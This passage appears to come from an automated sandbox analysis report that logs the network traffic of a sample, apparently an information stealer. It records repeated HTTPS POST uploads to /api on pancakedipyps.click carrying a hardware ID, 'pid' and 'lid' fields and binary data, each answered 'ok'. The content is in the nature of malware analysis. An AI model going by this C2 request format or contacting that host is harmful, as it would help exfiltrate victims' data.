                                                                                                                                                                                                                                                              2024-12-22 01:21:37 UTC1369INData Raw: 76 4f 45 65 39 36 6d 69 73 59 56 42 32 35 78 68 48 69 70 64 4b 6d 41 74 70 4d 4a 2f 58 4f 6d 4a 48 33 79 38 46 6b 64 42 4e 62 32 59 54 52 4c 54 7a 4c 37 34 6d 53 54 33 70 48 67 50 54 33 41 33 65 51 32 41 72 32 59 52 32 58 45 48 41 4f 51 50 5a 79 41 78 78 4c 78 4e 49 38 72 6c 6f 76 6a 31 49 4d 2f 49 51 43 4e 6e 46 52 70 59 44 59 69 47 65 30 44 78 68 52 64 34 6b 41 35 48 46 51 6d 56 76 42 6c 61 30 36 69 62 7a 59 51 6b 78 2b 46 52 66 6b 75 5a 61 6d 30 4e 34 66 59 43 63 4d 57 49 47 6a 6d 6b 44 6b 39 70 4d 65 6d 73 53 54 37 48 76 49 4c 59 6e 54 54 7a 74 47 77 7a 59 33 6b 57 51 44 47 49 37 6b 74 6f 34 62 30 44 61 4a 45 44 58 6c 30 56 77 4c 30 77 45 6c 66 73 6c 74 54 68 59 41 2b 63 55 56 70 4c 49 41 34 6c 44 59 44 2f 5a 68 48 5a 6a 53 74 77 6b 42 5a 33 66 52 57
                                                                                                                                                                                                                                                              Data Ascii: vOEe96misYVB25xhHipdKmAtpMJ/XOmJH3y8FkdBNb2YTRLTzL74mST3pHgPT3A3eQ2Ar2YR2XEHAOQPZyAxxLxNI8rlovj1IM/IQCNnFRpYDYiGe0DxhRd4kA5HFQmVvBla06ibzYQkx+FRfkuZam0N4fYCcMWIGjmkDk9pMemsST7HvILYnTTztGwzY3kWQDGI7kto4b0DaJEDXl0VwL0wElfsltThYA+cUVpLIA4lDYD/ZhHZjStwkBZ3fRW
                                                                                                                                                                                                                                                              2024-12-22 01:21:37 UTC1369INData Raw: 38 75 59 6b 38 33 63 4a 4f 4f 30 53 42 74 50 66 52 5a 41 46 62 54 65 61 31 54 56 70 54 39 41 69 41 35 50 59 52 57 35 72 46 45 2b 31 37 79 36 32 4a 45 42 32 72 6c 51 41 79 70 63 56 30 43 56 45 49 59 76 75 4f 47 31 64 6c 6a 5a 4f 67 4a 64 46 5a 43 39 4d 42 4c 6e 70 4a 36 45 71 51 44 37 6b 48 51 66 57 33 55 43 58 41 32 49 2b 6e 4e 67 34 61 6b 48 57 4a 51 2b 65 33 30 31 73 62 78 73 45 2f 4b 45 76 71 32 38 52 64 73 41 66 45 66 50 5a 52 6f 4a 44 65 48 32 41 6e 44 46 69 42 6f 35 70 44 70 44 57 53 6d 5a 6a 48 45 43 67 34 53 4f 36 49 45 67 35 34 42 63 47 32 4e 39 66 6c 67 4e 73 4f 35 37 55 4d 6d 42 55 31 79 5a 41 31 35 64 46 63 43 39 4d 42 49 50 33 4c 37 51 67 43 78 2f 6e 44 77 62 59 31 45 61 63 51 33 68 39 67 4a 77 78 59 67 61 4f 61 51 32 56 32 6b 5a 36 59 78 52
                                                                                                                                                                                                                                                              Data Ascii: 8uYk83cJOO0SBtPfRZAFbTea1TVpT9AiA5PYRW5rFE+17y62JEB2rlQAypcV0CVEIYvuOG1dljZOgJdFZC9MBLnpJ6EqQD7kHQfW3UCXA2I+nNg4akHWJQ+e301sbxsE/KEvq28RdsAfEfPZRoJDeH2AnDFiBo5pDpDWSmZjHECg4SO6IEg54BcG2N9flgNsO57UMmBU1yZA15dFcC9MBIP3L7QgCx/nDwbY1EacQ3h9gJwxYgaOaQ2V2kZ6YxR
                                                                                                                                                                                                                                                              2024-12-22 01:21:37 UTC1369INData Raw: 50 4d 6b 52 7a 50 68 47 41 33 56 32 56 2b 52 43 57 73 79 6e 74 73 39 66 45 33 45 49 67 69 61 32 55 70 68 62 78 70 45 73 2b 77 6f 38 32 45 4a 4d 66 68 55 58 35 4c 79 62 6f 63 56 62 58 47 36 79 79 42 6b 51 64 6f 2f 43 35 6a 55 56 47 56 2f 56 41 72 79 38 43 2b 69 62 78 45 67 38 41 4d 41 7a 5a 6c 55 30 41 52 72 63 38 47 63 50 57 46 49 32 79 49 45 6b 4e 4a 4b 61 32 6f 52 54 72 37 74 4b 62 73 6d 51 7a 50 6c 45 67 33 52 32 55 4b 52 44 32 4d 36 6c 39 56 32 49 41 62 52 4d 55 44 42 6c 33 52 34 61 41 78 4a 6f 71 4d 61 73 44 35 59 49 2b 30 45 41 5a 44 34 54 70 77 41 59 6a 53 4a 6e 43 6b 67 58 35 59 75 44 4e 6d 50 41 6d 68 72 47 45 65 31 37 79 65 2b 49 45 34 39 37 78 34 4a 77 4e 68 49 6d 41 39 76 50 6f 76 57 50 48 78 50 33 79 51 4f 6b 63 56 42 4b 43 46 55 51 36 71 68
                                                                                                                                                                                                                                                              Data Ascii: PMkRzPhGA3V2V+RCWsynts9fE3EIgia2UphbxpEs+wo82EJMfhUX5LybocVbXG6yyBkQdo/C5jUVGV/VAry8C+ibxEg8AMAzZlU0ARrc8GcPWFI2yIEkNJKa2oRTr7tKbsmQzPlEg3R2UKRD2M6l9V2IAbRMUDBl3R4aAxJoqMasD5YI+0EAZD4TpwAYjSJnCkgX5YuDNmPAmhrGEe17ye+IE497x4JwNhImA9vPovWPHxP3yQOkcVBKCFUQ6qh
                                                                                                                                                                                                                                                              2024-12-22 01:21:37 UTC1369INData Raw: 64 30 30 51 49 4b 77 74 52 49 6c 7a 31 5a 50 5a 37 49 4d 57 42 41 31 6d 6c 4f 32 64 67 43 4d 46 5a 55 44 50 4c 65 5a 76 4d 33 43 57 36 67 49 51 54 63 32 55 71 47 45 69 6f 51 6a 73 6f 38 64 51 54 77 4c 68 47 51 77 55 39 36 4c 31 6f 45 74 4b 46 77 34 32 45 4a 4d 76 46 55 58 34 4b 46 46 73 56 51 4d 47 50 4c 77 33 68 33 42 73 42 70 57 4d 75 5a 41 6e 6f 76 54 41 54 31 34 6a 71 68 4b 55 6f 67 34 31 4d 35 37 50 64 47 68 67 4a 71 4f 4a 58 69 43 48 74 46 32 43 63 48 6a 38 59 43 4a 69 38 62 42 4f 72 59 61 50 74 76 64 6e 69 67 44 45 65 4b 6c 33 69 54 44 57 6b 30 6a 38 31 37 54 6b 33 41 4b 41 32 53 32 77 42 70 59 67 52 44 38 71 39 6f 74 57 38 52 5a 71 35 55 41 38 4f 58 46 63 42 52 50 47 62 4b 69 32 59 38 57 5a 67 77 51 49 2b 58 47 6a 6f 68 56 46 62 79 75 57 6a 30 4c
                                                                                                                                                                                                                                                              Data Ascii: d00QIKwtRIlz1ZPZ7IMWBA1mlO2dgCMFZUDPLeZvM3CW6gIQTc2UqGEioQjso8dQTwLhGQwU96L1oEtKFw42EJMvFUX4KFFsVQMGPLw3h3BsBpWMuZAnovTAT14jqhKUog41M57PdGhgJqOJXiCHtF2CcHj8YCJi8bBOrYaPtvdnigDEeKl3iTDWk0j817Tk3AKA2S2wBpYgRD8q9otW8RZq5UA8OXFcBRPGbKi2Y8WZgwQI+XGjohVFbyuWj0L
                                                                                                                                                                                                                                                              2024-12-22 01:21:37 UTC1369INData Raw: 58 46 74 48 58 52 74 42 4e 4a 7a 58 5a 68 47 51 67 42 74 49 34 51 4d 47 48 45 44 4d 36 52 78 50 69 73 7a 66 39 4e 67 6b 67 6f 45 78 56 6e 4a 64 66 30 46 73 6e 64 4a 72 4f 4a 47 68 46 77 43 70 48 70 2b 6c 6b 61 32 67 53 52 37 7a 32 4f 66 45 41 53 6a 33 73 47 41 44 45 36 58 4f 46 41 47 6b 39 6e 73 6f 6e 4c 67 69 57 4a 6b 44 42 37 67 4a 35 5a 52 4d 49 2b 71 30 35 6f 43 46 43 49 4f 64 55 4f 4a 79 58 56 64 42 62 4a 77 61 61 30 6a 68 70 55 4d 64 6b 4a 70 72 51 52 47 74 68 41 31 58 79 72 32 69 31 62 78 46 6b 72 6c 51 44 77 35 63 56 77 46 45 38 5a 73 71 4c 5a 6a 78 5a 6d 44 42 41 6a 35 63 61 4f 79 46 55 56 76 4b 35 61 50 51 68 52 44 66 6a 47 67 54 41 78 55 75 54 46 57 52 30 70 2b 49 54 59 30 76 54 4a 77 65 6e 36 57 4e 69 66 78 6c 4c 74 64 38 57 68 44 35 4f 4a 71
                                                                                                                                                                                                                                                              Data Ascii: XFtHXRtBNJzXZhGQgBtI4QMGHEDM6RxPiszf9NgkgoExVnJdf0FsndJrOJGhFwCpHp+lka2gSR7z2OfEASj3sGADE6XOFAGk9nsonLgiWJkDB7gJ5ZRMI+q05oCFCIOdUOJyXVdBbJwaa0jhpUMdkJprQRGthA1Xyr2i1bxFkrlQDw5cVwFE8ZsqLZjxZmDBAj5caOyFUVvK5aPQhRDfjGgTAxUuTFWR0p+ITY0vTJwen6WNifxlLtd8WhD5OJq


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              81192.168.2.450523172.67.209.202443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:21:39 UTC283OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=C84PJX9V2KB3Z1K3
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 13243
                                                                                                                                                                                                                                                              Host: pancakedipyps.click
                                                                                                                                                                                                                                                              2024-12-22 01:21:39 UTC13243OUTData Raw: 2d 2d 43 38 34 50 4a 58 39 56 32 4b 42 33 5a 31 4b 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 43 38 34 50 4a 58 39 56 32 4b 42 33 5a 31 4b 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 43 38 34 50 4a 58 39 56 32 4b 42 33 5a 31 4b 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 43 38 34
                                                                                                                                                                                                                                                              Data Ascii: --C84PJX9V2KB3Z1K3Content-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--C84PJX9V2KB3Z1K3Content-Disposition: form-data; name="pid"2--C84PJX9V2KB3Z1K3Content-Disposition: form-data; name="lid"FATE99--test--C84
                                                                                                                                                                                                                                                              2024-12-22 01:21:40 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:21:40 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=p1sc8d3v7vqhihj77uferhgb54; expires=Wed, 16 Apr 2025 19:08:19 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QUMXdywjicM5lneceZQo4K4pXCXf31fBBYd0PfTDWgSzRm5JxhrMI7FbywZVmkzjIdzgFgxPQ0wpQx%2BDTtEtVIiVwZVnJiOpVAUzu%2BOTUPlRTDHUgI4G2L%2F07JyjghqLrPjV07tv"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c4bdf7b997279-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1825&min_rtt=1819&rtt_var=695&sent=8&recv=17&lost=0&retrans=0&sent_bytes=2848&recv_bytes=14184&delivery_rate=1558996&cwnd=220&unsent_bytes=0&cid=83d8c14e222dbc32&ts=1169&x=0"
                                                                                                                                                                                                                                                              2024-12-22 01:21:40 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                              2024-12-22 01:21:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              82192.168.2.450526172.67.209.202443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:21:42 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=Q56VLCO4
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 8723
                                                                                                                                                                                                                                                              Host: pancakedipyps.click
                                                                                                                                                                                                                                                              2024-12-22 01:21:42 UTC8723OUTData Raw: 2d 2d 51 35 36 56 4c 43 4f 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 51 35 36 56 4c 43 4f 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 51 35 36 56 4c 43 4f 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 51 35 36 56 4c 43 4f 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69
                                                                                                                                                                                                                                                              Data Ascii: --Q56VLCO4Content-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--Q56VLCO4Content-Disposition: form-data; name="pid"2--Q56VLCO4Content-Disposition: form-data; name="lid"FATE99--test--Q56VLCO4Content-Dispositi
                                                                                                                                                                                                                                                              2024-12-22 01:21:42 UTC1134INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:21:42 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=49imcf2h3jdvb70i62kthrkth0; expires=Wed, 16 Apr 2025 19:08:21 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DLtk3NaOqkbjZLdDss8Yi%2BdsW0gAw6cH0v%2FQqGS5UCbQi%2BuSczUWMXTcW6kNSfu0Bk3w8qEt5ETHCu6bH77Qn3nbnqQJlXDiBHhjpg%2FgkCjFSFCBpAI%2FII934b%2BdlN4gHAapEuee"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c4beeaf9f42d7-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1558&min_rtt=1549&rtt_var=600&sent=11&recv=14&lost=0&retrans=0&sent_bytes=2849&recv_bytes=9655&delivery_rate=1794714&cwnd=245&unsent_bytes=0&cid=a112dbf0b4679559&ts=920&x=0"
                                                                                                                                                                                                                                                              2024-12-22 01:21:42 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                              2024-12-22 01:21:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              83192.168.2.450527172.67.209.202443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:21:44 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=K7MCZHBBFF0P3
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 20406
                                                                                                                                                                                                                                                              Host: pancakedipyps.click
                                                                                                                                                                                                                                                              2024-12-22 01:21:44 UTC15331OUTData Raw: 2d 2d 4b 37 4d 43 5a 48 42 42 46 46 30 50 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4b 37 4d 43 5a 48 42 42 46 46 30 50 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4b 37 4d 43 5a 48 42 42 46 46 30 50 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 4b 37 4d 43 5a 48 42 42 46 46 30 50
                                                                                                                                                                                                                                                              Data Ascii: --K7MCZHBBFF0P3Content-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--K7MCZHBBFF0P3Content-Disposition: form-data; name="pid"3--K7MCZHBBFF0P3Content-Disposition: form-data; name="lid"FATE99--test--K7MCZHBBFF0P
                                                                                                                                                                                                                                                              2024-12-22 01:21:44 UTC5075OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii: lrQMn 64F6(X&7~`aO
                                                                                                                                                                                                                                                              2024-12-22 01:21:45 UTC1125INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:21:45 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=bdd9417l814jd5r1g31ou8feo0; expires=Wed, 16 Apr 2025 19:08:23 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E2G8y1ab9fSRIdBBLcHebcFHS4dQBTuiJgGJkE2DQCRtB1KZXlJz9PEqZGSUbKnDaOyNKPCoSJGOONJn%2FLbFMr9eLEAWwLYFPtn1tQ4SAsQ3aF7kZ4nDCP88eQAJVPvEWe0rJly5"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c4bfc498e1a44-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1799&min_rtt=1791&rtt_var=687&sent=11&recv=25&lost=0&retrans=0&sent_bytes=2848&recv_bytes=21366&delivery_rate=1574123&cwnd=128&unsent_bytes=0&cid=515f1ebf0047ed83&ts=985&x=0"
                                                                                                                                                                                                                                                              2024-12-22 01:21:45 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                              2024-12-22 01:21:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              84192.168.2.450533172.67.209.202443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:21:46 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=31BRR4LV
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 1294
                                                                                                                                                                                                                                                              Host: pancakedipyps.click
                                                                                                                                                                                                                                                              2024-12-22 01:21:46 UTC1294OUTData Raw: 2d 2d 33 31 42 52 52 34 4c 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 33 31 42 52 52 34 4c 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 33 31 42 52 52 34 4c 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 33 31 42 52 52 34 4c 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69
                                                                                                                                                                                                                                                              Data Ascii: --31BRR4LVContent-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--31BRR4LVContent-Disposition: form-data; name="pid"1--31BRR4LVContent-Disposition: form-data; name="lid"FATE99--test--31BRR4LVContent-Dispositi
                                                                                                                                                                                                                                                              2024-12-22 01:21:47 UTC1126INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:21:47 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=earufd936dgg4torboprgbjalp; expires=Wed, 16 Apr 2025 19:08:26 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0nqTu2eJBFgWTf2Obe%2B5k3XxPFqE1dd25CmgaKK8Idkey2Og4SKBuZjzJata5FppxyL5UrhPOLm3iPSW93hQbRJf7S4qS7lSx6obKpuTSq95GXO3gn%2BpiQRm8YbDPVm%2Bgos9MVLy"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c4c0dac2a7d00-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1795&min_rtt=1790&rtt_var=681&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2847&recv_bytes=2204&delivery_rate=1594756&cwnd=243&unsent_bytes=0&cid=2b256ddd122268d4&ts=783&x=0"
                                                                                                                                                                                                                                                              2024-12-22 01:21:47 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                              2024-12-22 01:21:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              85192.168.2.450541172.67.209.202443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:21:49 UTC286OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
